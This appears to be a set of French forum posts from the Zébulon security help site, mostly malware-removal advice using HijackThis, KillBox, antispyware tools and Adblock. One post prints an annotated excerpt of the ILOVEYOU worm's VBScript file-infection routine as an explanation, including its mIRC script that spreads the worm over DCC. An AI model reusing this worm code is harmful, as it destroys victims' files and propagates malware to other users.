megataupe

Bonjour l'Irlandais et bienvenue sur zébulon sécurité. Tu télécharges RegSeeker ici : http://telechargement.zebulon.fr/category-12.html tu l'installes puis tu cliques sur l'onglet rechercher. Dans la fenêtre chercher, tu tapes backweb et tu sélectionnes celui que tu veux virer (faire quand même au préalable une sauvegarde de la clé par sécurité).

Bonjour Rafiot. Voici la liste des restrictions que l'on peut définir pour restreindre certains accès au Panneau de Configuration, dont NoAdminPage : NoDispCPL - désactive l'option "Affichage" NoDispBackgroundPage - cache la page "Fond d'écran" NoDispScrSavPage - cache la page "Economiseur d'écran" NoDispAppearancePage - cache la page "Apparence" NoDispSettingsPage - cache la page "Paramètres" NoSecCPL - désactive l'option "Utilisateurs" NoPwdPage - cache la page "Changer le mot de passe" NoAdminPage - cache la page "Administration à distance" NoProfilePage - cache la page "Profil d'utilisateur" NoDevMgrPage - cache la page "Gestionnaire de périphériques" NoConfigPage - cache la page "Profil matériel" NoFileSysPage - cache le bouton "Système de fichiers" NoVirtMemPage - cache le bouton "Mémoire virtuelle"

Bonjour loupiau. Si tu peux télécharger F-Prot à partir d'un autre PC pour le mettre sur disquette, tu devrais pouvoir éliminer le virus : http://claymania.com/f-prot-fr.html

Bonjour Elohel. Je ne vois rien de suspect sur ton mini log . Pense à bien sécuriser Firefox avec Adblock et le filtre qui tue (et plus si affinités ). Adblock est à télécharger ici : http://extensions.geckozone.org/Adblock/ Le filtre qui tue la pub est à télécharger là (en haut à droite de la page, fichier txt . Choisir le premier filtre : bloque les pubs et les stats) : http://adblock.free.fr/ Mode d'emploi : télécharger Adblock et le filtre strato puis, fermer Firefox et le relancer pour activer Adblock. Comment importer le filtre strato dans Adblock : Aller dans Outils/Adblock/préférences/options d'Adblock/importer des filtres. Indiquer le chemin du fichier téléchargé puis valider. Il est également possible de durcir encore un peu plus le filtrage avec l'extension NoScript à voir ici : http://extensions.geckozone.org/NoScript/

Pour ceux qui veulent en savoir un peu plus sur le code du plus célébre virus des années 2000, voici une description de son action sur les fichiers. Je précise pour les apprentis hackers que ce code est inexploitable tel quel. Infectfiles Cette partie du virus "infecte" les fichiers vbs, vbe, js, jse, css, wsh, sct, hta (qui sont effacés et remplacés par le code du virus). Les fichiers *.jpg et *.jpeg sont effacés apres avoir créé des copies du virus *.jpg.vbs et *.jpeg.vbs, les fichiers *.mp3 et *.mp2 son chachés (cfr attributs de fichiers) et des fichiers *.mp3.vbs et *.mp2.vbs sont créés, contenant ... le code du virus, eh oui !!! Si le virus trouve un répertoire contenant mirc, le fichier script.ini est écrasé et remplacé par un code envoyant automatiquement le code du virus(au format html) à toute personne se joignant a un channel ou l'ordinateur infecté se trouve. sub infectfiles(folderspec) = 20 Infecte les fichiers du dossier actuel On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 Déclaration des variables set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc Pour chaque fichier du directory ext = fso.GetExtensionName(f1.path) Récupération de l'extension du fichier ext = lcase(ext) Mise de l'extension en minuscules s = lcase(f1.name) Mise du nom de fichier en minuscule if (ext = "vbs") or (ext = "vbe") then s'il s'agit d'un VBS ou d'un VBE. set ap = fso.OpenTextFile(f1.path, 2, true) Ouverture du fichier. ap.write vbscopy Ecriture tu code du virus sur le fichier ap.close Fermeture du fichier elseif(ext = "js") or (ext = "jse") or (ext = "css") or (ext = "wsh") or (ext = "sct") or (ext = "hta") then S'il s'agit d'un JS, d'un JSE, CSS, WSH, SCT ou HTA set ap = fso.OpenTextFile(f1.path,2,true) Ouverture du fichier ap.write vbscopy Copie du virus ap.close Fermeture du fichier bname = fso.GetBaseName(f1.path) bname : nom du fichier source set cop = fso.GetFile(f1.path) cop : nom du fichier du virus (= au nom du fichier source) cop.copy(folderspec & "\" & bname & ".vbs") Copie du fichier modifié, avec l'extension .VBS en plus fso.DeleteFile(f1.path) Supression du fichier original elseif(ext = "jpg") or (ext = "jpeg") then S'il s'agit d'un JPG (ou JPEG) set ap = fso.OpenTextFile(f1.path,2,true) Ouverture du fichier ap.write vbscopy Copie du code du virus ap.close Fermeture du fichier set cop = fso.GetFile(f1.path) Nom du fichier "infecté" cop.copy(f1.path & ".vbs") Copie du fichier "infecté" sous le nouveau nom fso.DeleteFile(f1.path) Supression du fichier original elseif(ext = "mp3") or (ext = "mp2") then S'il s'agit d'un MP3 ou d'un MP2 set mp3 = fso.CreateTextFile(f1.path & ".vbs") Création du fichier .mp3.vbs (ou .mp2.vbs) mp3.write vbscopy Copie du code du virus mp3.close Fermeture du fichier mp3-mp2 set att = fso.GetFile(f1.path) att.attributes = att.attributes + 2 Rend le fichier actuel caché end if if (eq<>folderspec) then if (s = "mirc32.exe") or (s = "mlink32.exe") or (s = "mirc.ini") or (s = "script.ini") or (s = "mirc.hlp") then Si le fichier actuel est un fichier mirc, set scriptini = fso.CreateTextFile(folderspec & "\script.ini") on créé un fichier script scriptini.WriteLine "[script]" Ecriture du contenu du fichier script scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0 = on 1:JOIN:#:{" Quand une personne arrive sur le channel scriptini.WriteLine "n1 = /if ( $nick == $me ) { halt }" si cette personne n'est pas nous-même scriptini.WriteLine "n2 = /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" Envoi du fichier .htm infecté scriptini.WriteLine "n3=}" scriptini.close Fermeture du fichier script eq = folderspec end if end if next = 20 end sub

Salut Tesgaz et bonne fête des pères à toi aussi. Que veux tu, quand deux grands esprits se rencontrent ça fait

Ben, on va lancer un appel au peuple. Les utilisateurs de l'usine à gaz sont demandés au rapport pour conseils judicieux sur l'utilisation du générateur de bons de sortie délivrés par ce cher Docteur.

La voici : Salut Telecharge: Pocket Killbox ici http://www.downloads.subratam.org/KillBox.exe une petite aide en image de killbox ici: http://cjoint.com/data/fwtnoBqAL2.htm Déconnecte toi d'internet: ? Vide le cache d'Internet Explorer et supprime les cookies: * Panneau de configuration >> Options internet >> Onglet "Général" - Clic sur [supprimer les cookies] - Clic sur [supprimer les fichiers] et coche la case "Supprimer tout le contenu hors connexion" Valide avec ok Pour ne pas se retrouver avec des points de restauration systeme infectés il vaut mieux la désactiver: ? Désactive la restauration systéme. Clic droit sur poste de travail > propriétés > onglet restauration système puis cocher "désactiver la restauration système". clic sur ok pour valider (accepte le redemarrage). -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ ? Lance hijackthis et clic sur "do a system scan only" cocher la case au début des lignes suivantes: O4 - HKLM\..\Run: [Microsoft Update] wuamkop.exe O4 - HKLM\..\Run: [Windows Time] winmgr.exe O4 - HKLM\..\Run: [Compaq Service Drivers] wincmd.exe O4 - HKLM\..\RunServices: [Microsoft Update] wuamkop.exe O4 - HKLM\..\RunServices: [Windows Time] winmgr.exe O4 - HKLM\..\RunServices: [Compaq Service Drivers] wincmd.exe O4 - HKCU\..\Run: [Windows Time] winmgr.exe O4 - HKCU\..\Run: [Compaq Service Drivers] wincmd.exe O4 - HKCU\..\RunServices: [Compaq Service Drivers] wincmd.exe valider avec [fix checked] -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ 1- Ferme tout les progs en cours 2- Double-clic sur KillBox.exe 3- Selectionne "Delete on Reboot" 4- Copie la 1ere ligne de la liste en gras et colle dans "Full Path of File to Delete" 5- clic sur la croix blanche dans le rond rouge 6- une fenetre va apparaitre pour confirmation clic sur YES 7- une seconde fenetre te demande si tu veux redemarrer clic sur NO Recommence à l'étape 3 pour chaques lignes en gras. Une fois le dernier fichier selectionnées, a l'étape 7 clic sur YES liste: C:\WINDOWS\System32\wincmd.exe C:\WINDOWS\System32\wuamkop.exe C:\WINDOWS\System32\winmgr.exe C:\Documents and Settings\kiki et lucie\msdirectx.sys le pc va redemarrer automatiquement, dans le cas contraire tu le redemarre manuellement. Suite : vérifie en utilisant rechercher que msdirectx.sys a bien disparu. ensuite, clic droit sur poste de travail> Propriétés > clic sur matériel puis sur gestionnaire des périfériques clic sur affichage, et coche "afficher les périfériques cachés" recherche "Pilotes non plug-and-play" Déploie (+) et recherche cette entrée exacte: msdirectx (ni touche pas) dis moi si elle est présente.

Il me semble que tu avais employé la méthode du "génie" de CCM pour ce msdirectx.sys IPL ? Est-elle la bonne ?

Comme ils m'avaient censuré lorsque j'ai indiqué le filtre à utiliser pour s'abstraire de la vision répétée de cette horreur, je garde mon filtre avec lequel j'ai droit à un superbe cadre blanc du plus bel effet et tout à fait virginal .

Dommage queruak. Que le soleil te suive sur la route du futur. Donnes un cheval à celui qui dit la vérité : il en aura besoin pour s'enfuir.

Bonjour ami queruak (celui des bons et mauvais jours). Puisque tu fais référence à l'intelligence, cet être suprème (clin d'oeil à Robespierre) qui efface toutes les différences, toutes les divergences , j'attend de toi que tu traduises bientôt en acte le sens de tes paroles. A bientôt au pupitre la panthère noire On compte sur toi (pas seulement en hiver )

Norton est très, très encombrant (doux euphémisme). Tu as évidemment la solution de désinstaller le Mordhom envahissant (tu demandes avant pour la procédure d'éjection de ton PC du pachyderme) et de le remplacer par Zone Alarm ou Kerio. Le pare feu d'XP te protège en entrée mais, pas sur ce qui sort de ton PC (à toi d'évaluer les risques donc). Tu peux aussi n'utiliser que la fonction antivirus de Norton, si tu veux le garder, et le réactiver quand tu ne te sers plus d'AMSN.

Salut Parallel Universe . Effectivement, deux firewall actifs + un pare-brise (Norton ) = toi AMSN : tu sors pas . Comme quoi, il faut bien détailler les problèmes rencontrés pour obtenir une aide efficace. Bon dimanche aux papas

Pour Zébulon, ce sera 10$ car, Yann n'est pas riche. Pour Tesgaz, peut être un morceau (des miettes) du St Nectaire. Je vais chercher mais, il me semble que l'on peut bloquer avec Adblock ce genre de tag douteux (c'est déjà fait pour l'horrible pub rouge de PCA ).

Je n'ai qu'une chose à dire : "merci Yann, merci Gérard pour cette décision de bon sens, emprunte d'une grande humanité, que nous attendions de nos voeux". Maintenant, j'espère simplement que toutes celles et ceux (novices, confirmés, experts) qui ont fait de la lutte contre les vermines qui polluent Internet l'une de leur priorité continueront à oeuvrer ensemble, en toute amitié et dans le respect des différences ou compétences de chacun et ce, sans état d'âme désormais. Et encore une à Yann et Gérard, alias IPL La vie peut être belle sur zébulon

Bonjour Laurie et bienvenue sur Zébulon sécurité. Ton PC est en effet infecté alors, exécute la procédure suivante : lance l'Explorateur Windows et supprime le contenu de --- C:\Temp --- C:\Windows\Temp suppression des fichiers inutiles par : -----Démarrer / Exécuter / tape CleanMgr et clique sur OK / OK pour accepter l'examen du disque C: / coche toutes les cases et clique sur OK / OK pour confirmer la suppression des fichiers inutiles. nettoyage de la base de registres par EasyCleaner-Registre de Toni Helenius sur http://personal.inet.fi/business/toniarts/ecleane.htm nettoyage du cache Java (ajouté par mégataupe) par CCleaner, à télécharger sur le site de l'auteur (ouvrir l'onglet applications, décocher toutes les cases sauf celle concernant Internet Sun Java puis, cliquer sur lancer le nettoyage). http://www.ccleaner.com/ccdownload.asp examen antivirus en ligne par HouseCall de Trend Micro sur http://www.secuser.com/antivirus/ ; (à faire avec Internet Explorer ou Firefox en java) note le nom du virus et le chemin+nom du fichier infecté ; sélectionne toutes les lignes affichées et clique sur Clean puis sur Delete pour toutes celles qui restent recherche d'hijack furieux avec CWShredder (ajouté par megataupe) à télécharger sur http://www.intermute.com/products/cwshredder.html examen antitrojan par A² sur http://www.emsisoft.net/fr/software/free/ ; il est nécessaire de s'enregistrer pour utiliser A² ; mets bien à jour ; supprime tout ce qu'il trouve examen antispyware par ------ Ad-Aware SE 1.05 sur http://www.lavasoft.de/support/download/#free ; mets bien à jour ; supprime tout ce qu'il trouve ----- Spybot Search and Destroy 1.3 sur http://www.safer-networking.org/?page=download ; mets bien à jour ; supprime tout ce qu'il trouve. Ensuite, poster un nouveau rapport hijackthis avec la dernière version du logiciel : - télécharger HijackThis de Merijn Belekom http://www.spywareinfo.com/~merijn/downloads.html - l'installer dans un répertoire spécifique (peu importe où mais pas sur le bureau ni dans le répertoire Temp) -redémarrer en mode sans échec (appuyer sur la touche F8 ou F5 après le reboot du PC) - lancer HJT et cliquer sur "Config", s'assurer que "Make backups before fixing items" est activé. - cliquer sur 'Scan', l'affichage est instantané. - à la fin du Scan, cliquer sur 'Save log', indiquer le répertoire dans lequel enregistrer le résultat et cliquer sur OK. - une fenêtre Bloc-notes s'ouvre : Ctrl-A pour sélectionner tout le texte, Ctrl-C pour le copier dans le presse papier. -redémarrer en mode normal - mettre le texte dans un post ci-dessous (Ctrl-V) de manière à ce que nous te disions ce qu'il faut faire. - fermer la fenêtre du Bloc-notes ; fermer la fenêtre HijackThis. - attendre l'analyse et la réponse.

Bonjour à tous . Ouais..........ben ça fait cher la cuisse de grenouille. J'espère que les gentils batraciens vont vite se débarasser de cette saleté.

Hijackthis est toujours à utiliser en dernier, de préférence en mode sans échec.

Il n'y a rien à faire (tu peux le fermer) car, s'il trouve un Furieux de la gamme CWS, il le trucide tout de suite.

Bon. recommence toute la procédure par le début car, ton PC est très infecté : lance l'Explorateur Windows et supprime le contenu de --- C:\Temp --- C:\Windows\Temp suppression des fichiers inutiles par : -----Démarrer / Exécuter / tape CleanMgr et clique sur OK / OK pour accepter l'examen du disque C: / coche toutes les cases et clique sur OK / OK pour confirmer la suppression des fichiers inutiles. nettoyage de la base de registres par EasyCleaner-Registre de Toni Helenius sur http://personal.inet.fi/business/toniarts/ecleane.htm nettoyage du cache Java (ajouté par mégataupe) par CCleaner, à télécharger sur le site de l'auteur (ouvrir l'onglet applications, décocher toutes les cases sauf celle concernant Internet Sun Java puis, cliquer sur lancer le nettoyage). http://www.ccleaner.com/ccdownload.asp examen antivirus en ligne par HouseCall de Trend Micro sur http://www.secuser.com/antivirus/ ; (à faire avec Internet Explorer ou Firefox en java) note le nom du virus et le chemin+nom du fichier infecté ; sélectionne toutes les lignes affichées et clique sur Clean puis sur Delete pour toutes celles qui restent recherche d'hijack furieux avec CWShredder (ajouté par megataupe) à télécharger sur http://www.intermute.com/products/cwshredder.html examen antitrojan par A² sur http://www.emsisoft.net/fr/software/free/ ; il est nécessaire de s'enregistrer pour utiliser A² ; mets bien à jour ; supprime tout ce qu'il trouve examen antispyware par ------ Ad-Aware SE 1.05 sur http://www.lavasoft.de/support/download/#free ; mets bien à jour ; supprime tout ce qu'il trouve ----- Spybot Search and Destroy 1.3 sur http://www.safer-networking.org/?page=download ; mets bien à jour ; supprime tout ce qu'il trouve. Ensuite, poster un nouveau rapport hijackthis avec la dernière version du logiciel : - télécharger HijackThis de Merijn Belekom http://www.spywareinfo.com/~merijn/downloads.html - l'installer dans un répertoire spécifique (peu importe où mais pas sur le bureau ni dans le répertoire Temp) - lancer HJT et cliquer sur "Config", s'assurer que "Make backups before fixing items" est activé. - cliquer sur 'Scan', l'affichage est instantané. - à la fin du Scan, cliquer sur 'Save log', indiquer le répertoire dans lequel enregistrer le résultat et cliquer sur OK. - une fenêtre Bloc-notes s'ouvre : Ctrl-A pour sélectionner tout le texte, Ctrl-C pour le copier dans le presse papier. - mettre le texte dans un post ci-dessous (Ctrl-V) de manière à ce que nous te disions ce qu'il faut faire. - fermer la fenêtre du Bloc-notes ; fermer la fenêtre HijackThis. - attendre l'analyse et la réponse.

Pourquoi ? T'as peur des fantômes . Si JV16 n'a rien trouvé, et bien c'est qu'ils ont complétement disparus. J'espère qu'ils ne vont pas te manquer .

Bonjour Hungo. JV16 devrait te dire s'ils sont encore sur ton DD : A prélever dans la caverne de Tesgaz http://speedweb1.free.fr/frames2.php?page=download1

Si c'est vraiment MSN qui t'ennuie (suis quand même les conseils d'IPL, ton PC se sentira mieux), tu procédes comme suit : Tu le désinstalles via ajout/suppression de programmes du panneau de configuration. Tu peux ensuite le réinstaller mais en refusant les sponsors.

Salut quemare. Je ne pense pas qu'il y ait de relation de cause à effet. Essaie en recréant une nouvelle connexion (wanadoo 2 par exemple) que tu pourras tester afin de vérifier si le problème persiste. Tu peux aussi aller faire un tour dans le gestionnaire de périphériques afin de vérifier que tu n'as pas le concentrateur USB qui foire.